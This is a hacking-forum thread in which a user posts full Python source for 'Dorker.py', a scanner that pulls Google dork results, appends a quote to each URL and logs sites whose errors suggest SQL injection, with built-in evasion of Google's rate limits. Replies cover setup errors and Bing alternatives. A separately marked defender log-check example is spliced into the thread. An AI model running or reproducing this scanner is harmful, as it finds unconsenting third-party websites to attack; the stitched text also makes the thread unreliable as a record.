Dorker.py A SQL Injection Dork Scanner
  • Xin
    Posts: 3,251
    I recently found that none of the dork scanners I used work anymore due to the change in Google search.

    This script uses a modified version of xgoogle, so do not download the original and expect it to work.

    Also, it is not 100% perfect yet, as Google has a very good defence against automated dork scanning and picks it up after about the 5th or 6th page, so I'm trying to find ways around it.

    http://i.imgur.com/huRT3.png


    http://i.imgur.com/ROgGx.png

    Source:
    #!/usr/bin/python
    ## Dorker.py
    ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
    ## Author: Xinapse
    ## Website: http://www.iexploit.org
    ## Email: iexploittube@gmail.com
    ## Twitter: #iExploitXinapse
    ## Version 0.0.1
    ## Usage dorker.py [options]
    from xgoogle.search import GoogleSearch, SearchError
    import time, urllib2, optparse

    print '''
    ________ __
    \______ \ ___________| | __ ____ _______
    | | \ / _ \_ __ \ |/ /_/ __ \\_ __ \
    | ` ( <_> ) | \/ < \ ___/ | | \/
    /_______ /\____/|__| |__|_ \ \___ >|__|
    \/ \/ \/
    ---------------------------------------------------------------------------------
    -- dorker.py --
    -- SQL Dork finder script --
    -- Author: Xinapse --
    -- Website: http://www.iexploit.org --
    -- Email: iexploittube@gmail.com --
    -- Twitter: #iExploitXinapse --
    -- Version 0.0.1 --
    -- Usage dorker.py [options] --
    ---------------------------------------------------------------------------------
    '''
    parser = optparse.OptionParser()
    options = optparse.OptionGroup(parser, 'Options')
    parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')
    parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')
    parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution")
    parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')
    (opts, args) = parser.parse_args()
    urlno = 0
    invuln = 0
    if opts.dork:
        dork = opts.dork
    else:
        print '>> Please enter a dork'
    if opts.file:
        filename = opts.file
    else:
        print '>> Please enter a filename'
    if opts.verbose:
        verbose = 'true'
    else:
        verbose = 'false'
    if opts.evasion:
        evas = opts.evasion
    else:
        evas = 10
    pagecount = 0
    counter = 0
    try:
        pagecount = pagecount + 1
        if verbose == 'true':
            print '>> Crawling google page ' + str(pagecount) + '...'

        search = GoogleSearch(dork)

        while True:
            search.results_per_page=100
            tmp = search.get_results()

            if not tmp:
                break
                if verbose == 'true':
                    print '>> No more results...'

            for t in tmp:
                try:
                    url = t.url.encode("utf8")
                    if verbose == 'true':
                        print '>> Testing ' + url + ' for vulnerabilities...'
                    testurl = url + "'"
                    req = urllib2.urlopen(testurl)
                    data = req.read()
                    if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data:
                        f = open (filename, "a")
                        if verbose == 'true':
                            print ">> Found possible injection in " + url
                        f.write(testurl + "\n")
                        f.close()
                        counter = counter + 1
                    else:
                        invuln = invuln + 1
                except:
                    errors = 1
            if verbose == 'true':
                print '>> Sleeping to bypass google flood protection...'
            time.sleep(evas)

    except SearchError, e:
        print ">> Search failed: %s" % e

    print '>> Dorker scan ended'
    print '>> ' + str(counter) + ' vulnerable sites found'
    print '>> ' + str(invuln) + ' sites not vulnerable'
    print '>> Thank you for using Dorker, output has been saved to ' + filename





    Download entire archive with modded xgoogle
    http://min.us/mZKiVMNMeJn0q#1f
    Xin
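Added example, not part of the original thread or the script above: a defender-side log check for the probe the script sends, which is a GET for the page URL with a single `'` appended, made through `urllib2` (whose default User-Agent is `Python-urllib/x.y`). The log lines, IP addresses and the function name `find_quote_probes` are constructed for illustration, and the combined log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:10:01:02 +0000] "GET /item.php?id=4' HTTP/1.1" 500 312 "-" "Python-urllib/2.7"
203.0.113.7 - - [12/Mar/2012:10:01:03 +0000] "GET /news.php?cat=2%27 HTTP/1.1" 200 5120 "-" "Python-urllib/2.7"
198.51.100.9 - - [12/Mar/2012:10:02:10 +0000] "GET /item.php?id=4 HTTP/1.1" 200 4810 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2012:10:02:15 +0000] "GET /search.php?q=o'neil+books HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def find_quote_probes(log_text):
    """Return {ip: [hit, ...]} for requests whose decoded target ends in a single quote."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        target = unquote(m.group("target"))  # also catches the %27 encoded form
        # A quote in the middle of a value (o'neil) is normal input; a trailing one is the probe.
        if "?" not in target or not target.endswith("'"):
            continue
        hits[m.group("ip")].append({
            "target": target,
            "status": int(m.group("status")),
            # urllib2's default User-Agent: a supporting signal only, trivially changed
            "scripted_ua": m.group("ua").startswith("Python-urllib/"),
            # a 5xx on a quote probe suggests the query broke and may have leaked an error
            "server_error": m.group("status").startswith("5"),
        })
    return dict(hits)

if __name__ == "__main__":
    for ip, probes in find_quote_probes(SAMPLE_LOG).items():
        for p in probes:
            flags = [k for k in ("scripted_ua", "server_error") if p[k]]
            print(ip, p["status"], p["target"], ",".join(flags))
```

Hits with `server_error` set are the ones to fix first: the script only records a site when the response body contains the text "sql", so pages that return a generic error instead of the database message do not show up in its output.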
  • peann
    Posts: 14
    Have you tried using the BING api instead? Google seems to be clamping down on dork-whoring a lot lately.

    http://www.bing.com/developers/
  • Xin
    Posts: 3,251
    No, I haven't, but I'll check it out, thanks
    Xin
  • s1n4
    Posts: 88
    Thanks man ;)
    It's excellent :)
  • esta
    Posts: 4
    All the dork scanners on Google are not working anymore. I am also looking for a solution.
    I do not know any that works for Bing at the moment. If I find one I'll let you know.
  • Xin
    Posts: 3,251
    said:


    plz help me

    >> Please enter a dork
    >> Please enter a filename
    Traceback (most recent call last):
    File "./dorker.py", line 63, in <module>
    search = GoogleSearch(dork)
    NameError: name 'dork' is not defined



    Did you enter a dork? And do you have the xgoogle library ?
    Xin
  • Corrosion
    Posts: 121
    Sweet :D I'd love to try it sometime
  • nu11byte
    Posts: 53
    said:


    plz help me

    >> Please enter a dork
    >> Please enter a filename
    Traceback (most recent call last):
    File "./dorker.py", line 63, in <module>
    search = GoogleSearch(dork)
    NameError: name 'dork' is not defined



    Should be banned for being a noob...
  • ~$ python dorker.py --help
      File "dorker.py", line 10
        from xgoogle.search import GoogleSearch, SearchError
                    ^
    SyntaxError: invalid syntax

    Why? :(
    What to do guys?
    Thanks in advance.
  • Mr. P-teo
    Posts: 269
    This looks pretty sweet, however it would be great if you could sort the issues with posting less than, greater than etc...
    Skype: mrpt3o
    Twitter: MrPteo


  • mssg3r
    Posts: 2
    get xgoogle library from https://github.com/pkrumins/xgoogle

    and do "python setup.py install"
  • mssg3r
    Posts: 2
    H0000! guys Just found bing dorker "https://code.google.com/p/dorkmaster/"